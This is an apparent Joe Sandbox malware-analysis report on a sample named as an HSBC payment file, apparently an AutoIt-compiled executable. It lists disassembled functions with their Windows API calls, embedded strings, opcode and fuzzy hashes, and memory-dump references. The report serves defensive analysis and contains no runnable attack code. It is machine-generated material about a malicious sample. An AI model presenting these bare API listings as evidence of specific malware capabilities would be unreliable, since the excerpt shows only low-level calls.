                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3521893082-0
                                                                                                                                • Opcode ID: d8348fa6eb058316e611cafa70059b33872affc905acef9f1601909e9fe9015d
                                                                                                                                • Instruction ID: cbce1ed302d04d365f4d348dff7d3be3ef4dc7c7a327bf85d4b1e2e052d57c0c
                                                                                                                                • Opcode Fuzzy Hash: d8348fa6eb058316e611cafa70059b33872affc905acef9f1601909e9fe9015d
                                                                                                                                • Instruction Fuzzy Hash: 75918D72408305FFC7119FA4DC08A5B7BA9FFCA321F108B29F9A2961A0D739D944CB56
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000), ref: 007974DE
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0079759D
                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007975DB
                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007975ED
                                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00797633
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0079763F
                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00797683
                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00797692
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 007976A2
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 007976A6
                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007976B6
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007976BF
                                                                                                                                • DeleteDC.GDI32(00000000), ref: 007976C8
                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007976F4
                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0079770B
                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00797746
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0079775A
                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0079776B
                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0079779B
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 007977A6
                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007977B1
                                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007977BB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                • Opcode ID: 8a6cc6bd63c5715694add47cfec262b2568b9eff86550fb7986a6eb58cc7bc96
                                                                                                                                • Instruction ID: 46804a8f5228c2821e6d9505aababacf556bf06c56fa99c54c4491f93231520f
                                                                                                                                • Opcode Fuzzy Hash: 8a6cc6bd63c5715694add47cfec262b2568b9eff86550fb7986a6eb58cc7bc96
                                                                                                                                • Instruction Fuzzy Hash: 6EA185B1A00619BFEB14DFA4DC4AFAE7779EB49714F048114FA14AB2E0D778AD00CB64
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0078AD1E
                                                                                                                                • GetDriveTypeW.KERNEL32(?,007AFAC0,?,\\.\,007AF910), ref: 0078ADFB
                                                                                                                                • SetErrorMode.KERNEL32(00000000,007AFAC0,?,\\.\,007AF910), ref: 0078AF59
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                • Opcode ID: b1c27400e0bc270b99aa1046b1adda680e612c0fc1629edeac096b54d89ce657
                                                                                                                                • Instruction ID: 392a452d84a919244cb15c6703156b750101c724564c44310baa423d4028738c
                                                                                                                                • Opcode Fuzzy Hash: b1c27400e0bc270b99aa1046b1adda680e612c0fc1629edeac096b54d89ce657
                                                                                                                                • Instruction Fuzzy Hash: 66519DF0688205FB9B50FB54C986CBD73B1EB49700B248457E606AB391DABCDD41DB53
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                                • Opcode ID: 7d399035040a1fa863bc33e761180eac12e3e2d04606122253bb2a4502ac1c3e
                                                                                                                                • Instruction ID: 6aa037dc51e6253abf1f4d1c8ed4884e741ce4d6d07f4ef5a7ba687136cf7946
                                                                                                                                • Opcode Fuzzy Hash: 7d399035040a1fa863bc33e761180eac12e3e2d04606122253bb2a4502ac1c3e
                                                                                                                                • Instruction Fuzzy Hash: 2B811AB1600225EACB15AB60EC86FEF3768EF05710F04402AFD496A196EB7DDE45C2A1
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007A9AD2
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007A9B8B
                                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 007A9BA7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                                • Opcode ID: bdc295a2645f39a91f62a8695a58f75dccc4b48dd746fdf34a160f2d24d9cd85
                                                                                                                                • Instruction ID: 4f74127706ee1762d9aecfc0323e32fa981cf1e45c3230a8c9c5c46378ccd2a5
                                                                                                                                • Opcode Fuzzy Hash: bdc295a2645f39a91f62a8695a58f75dccc4b48dd746fdf34a160f2d24d9cd85
                                                                                                                                • Instruction Fuzzy Hash: 9802C031109241AFDB25CF24C848BAABBE5FFCA314F04862DF695D62A1D73CD964CB52
                                                                                                                                APIs
                                                                                                                                • GetSysColor.USER32(00000012), ref: 007AA903
                                                                                                                                • SetTextColor.GDI32(?,?), ref: 007AA907
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 007AA91D
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 007AA928
                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 007AA92D
                                                                                                                                • GetSysColor.USER32(00000011), ref: 007AA945
                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007AA953
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 007AA964
                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 007AA96D
                                                                                                                                • SelectObject.GDI32(?,?), ref: 007AA97A
                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007AA999
                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007AA9B0
                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007AA9C5
                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007AA9ED
                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007AAA14
                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 007AAA32
                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 007AAA3D
                                                                                                                                • GetSysColor.USER32(00000011), ref: 007AAA4B
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 007AAA53
                                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007AAA67
                                                                                                                                • SelectObject.GDI32(?,007AA5FA), ref: 007AAA7E
                                                                                                                                • DeleteObject.GDI32(?), ref: 007AAA89
                                                                                                                                • SelectObject.GDI32(?,?), ref: 007AAA8F
                                                                                                                                • DeleteObject.GDI32(?), ref: 007AAA94
                                                                                                                                • SetTextColor.GDI32(?,?), ref: 007AAA9A
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 007AAAA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1996641542-0
                                                                                                                                • Opcode ID: 2a3bd8fec7277fc59b7d5fee4b669dd3580da27cda6222d35cc2b3262c568be8
                                                                                                                                • Instruction ID: 530bd69b1ab7f61e702373c3601f7be1bf1db1e9b7be71e8931e33ac1b796024
                                                                                                                                • Opcode Fuzzy Hash: 2a3bd8fec7277fc59b7d5fee4b669dd3580da27cda6222d35cc2b3262c568be8
                                                                                                                                • Instruction Fuzzy Hash: C8512F71900208FFDF119FA4DC48EAE7BB9EF89320F118625F911AB2A1D7799940DF94
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007A8AC1
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A8AD2
                                                                                                                                • CharNextW.USER32(0000014E), ref: 007A8B01
                                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007A8B42
                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007A8B58
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A8B69
                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007A8B86
                                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 007A8BD8
                                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007A8BEE
                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007A8C1F
                                                                                                                                • _memset.LIBCMT ref: 007A8C44
                                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007A8C8D
                                                                                                                                • _memset.LIBCMT ref: 007A8CEC
                                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007A8D16
                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 007A8D6E
                                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 007A8E1B
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007A8E3D
                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A8E87
                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A8EB4
                                                                                                                                • DrawMenuBar.USER32(?), ref: 007A8EC3
                                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 007A8EEB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                                • Opcode ID: 1f0bf3b2c9a4019342f2285336df8ee0895f52689d78e195e8a337db5cd18caf
                                                                                                                                • Instruction ID: bcd1ba777392a7a121c88f6397142ac269b59a205aa67db381292e86429452d4
                                                                                                                                • Opcode Fuzzy Hash: 1f0bf3b2c9a4019342f2285336df8ee0895f52689d78e195e8a337db5cd18caf
                                                                                                                                • Instruction Fuzzy Hash: EAE18270901219EFDF60DF60CC88EEE7B79EF8A710F148256F915AA191DB788980DF61
                                                                                                                                APIs
                                                                                                                                • GetCursorPos.USER32(?), ref: 007A49CA
                                                                                                                                • GetDesktopWindow.USER32 ref: 007A49DF
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 007A49E6
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A4A48
                                                                                                                                • DestroyWindow.USER32(?), ref: 007A4A74
                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007A4A9D
                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A4ABB
                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007A4AE1
                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 007A4AF6
                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007A4B09
                                                                                                                                • IsWindowVisible.USER32(?), ref: 007A4B29
                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007A4B44
                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007A4B58
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 007A4B70
                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 007A4B96
                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 007A4BB0
                                                                                                                                • CopyRect.USER32(?,?), ref: 007A4BC7
                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 007A4C32
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                • Opcode ID: 6164319d05cfe4d9901b62531ebab18066e42c3b069ab620e9bc26171c2be098
                                                                                                                                • Instruction ID: d3e7a1351c6a460ee97267a1bf8d4dd2346d64751e685b63e1e887bd40934e51
                                                                                                                                • Opcode Fuzzy Hash: 6164319d05cfe4d9901b62531ebab18066e42c3b069ab620e9bc26171c2be098
                                                                                                                                • Instruction Fuzzy Hash: 4BB18B71604350EFDB04DF64D848B6ABBE4BFC5310F048A1CF5999B2A1D7B9E805CB95
                                                                                                                                APIs
                                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007844AC
                                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007844D2
                                                                                                                                • _wcscpy.LIBCMT ref: 00784500
                                                                                                                                • _wcscmp.LIBCMT ref: 0078450B
                                                                                                                                • _wcscat.LIBCMT ref: 00784521
                                                                                                                                • _wcsstr.LIBCMT ref: 0078452C
                                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00784548
                                                                                                                                • _wcscat.LIBCMT ref: 00784591
                                                                                                                                • _wcscat.LIBCMT ref: 00784598
                                                                                                                                • _wcsncpy.LIBCMT ref: 007845C3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                • API String ID: 699586101-1459072770
                                                                                                                                • Opcode ID: 287037749468361d624dd6542f25ea756b41ed225cfd7c7a46d2de0d87f4ccb0
                                                                                                                                • Instruction ID: 1f6c9ff60e29eba177f6d430b5379a97fd4b1ba658027cc93a6a880c4f164db9
                                                                                                                                • Opcode Fuzzy Hash: 287037749468361d624dd6542f25ea756b41ed225cfd7c7a46d2de0d87f4ccb0
                                                                                                                                • Instruction Fuzzy Hash: 2041F871A40211BBDB10BAB58C0BEBF777CDF42710F44416AF905E6183EB7C9A1197A9
                                                                                                                                APIs
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007228BC
                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 007228C4
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007228EF
                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 007228F7
                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0072291C
                                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00722939
                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00722949
                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0072297C
                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00722990
                                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 007229AE
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 007229CA
                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 007229D5
                                                                                                                                  • Part of subcall function 00722344: GetCursorPos.USER32(?), ref: 00722357
                                                                                                                                  • Part of subcall function 00722344: ScreenToClient.USER32(007E57B0,?), ref: 00722374
                                                                                                                                  • Part of subcall function 00722344: GetAsyncKeyState.USER32(00000001), ref: 00722399
                                                                                                                                  • Part of subcall function 00722344: GetAsyncKeyState.USER32(00000002), ref: 007223A7
                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00721256), ref: 007229FC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                                • Opcode ID: cd684950f4e8d83b9cb98618cd704257f9b12fc8490aa5ea7f2559997bc403ef
                                                                                                                                • Instruction ID: 97ec613145e5399fb6dfdc99fef6b9e892daabda7e9d78c28f7fde32b349f175
                                                                                                                                • Opcode Fuzzy Hash: cd684950f4e8d83b9cb98618cd704257f9b12fc8490aa5ea7f2559997bc403ef
                                                                                                                                • Instruction Fuzzy Hash: F2B18F71A0021AEFDB14DFA8DC85BED7BB4FB48315F108229FA15A7290DB78D851CB54
                                                                                                                                APIs
                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0077A47A
                                                                                                                                • __swprintf.LIBCMT ref: 0077A51B
                                                                                                                                • _wcscmp.LIBCMT ref: 0077A52E
                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0077A583
                                                                                                                                • _wcscmp.LIBCMT ref: 0077A5BF
                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0077A5F6
                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0077A648
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0077A67E
                                                                                                                                • GetParent.USER32(?), ref: 0077A69C
                                                                                                                                • ScreenToClient.USER32(00000000), ref: 0077A6A3
                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0077A71D
                                                                                                                                • _wcscmp.LIBCMT ref: 0077A731
                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0077A757
                                                                                                                                • _wcscmp.LIBCMT ref: 0077A76B
                                                                                                                                  • Part of subcall function 0074362C: _iswctype.LIBCMT ref: 00743634
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                • String ID: %s%u
                                                                                                                                • API String ID: 3744389584-679674701
                                                                                                                                • Opcode ID: 8fe0e2c477081240c8ba75f5a7a2503335bad37083fc867206eb5e59e62b1939
                                                                                                                                • Instruction ID: bf0e046655a89b500ca31740edb1ebf43c32f5010329ca794f1346a64bf73a68
                                                                                                                                • Opcode Fuzzy Hash: 8fe0e2c477081240c8ba75f5a7a2503335bad37083fc867206eb5e59e62b1939
                                                                                                                                • Instruction Fuzzy Hash: 3CA19071204206FBEB18DF64C888BAEB7A8FF84395F108529F99DD2150D738E955CB92
                                                                                                                                APIs
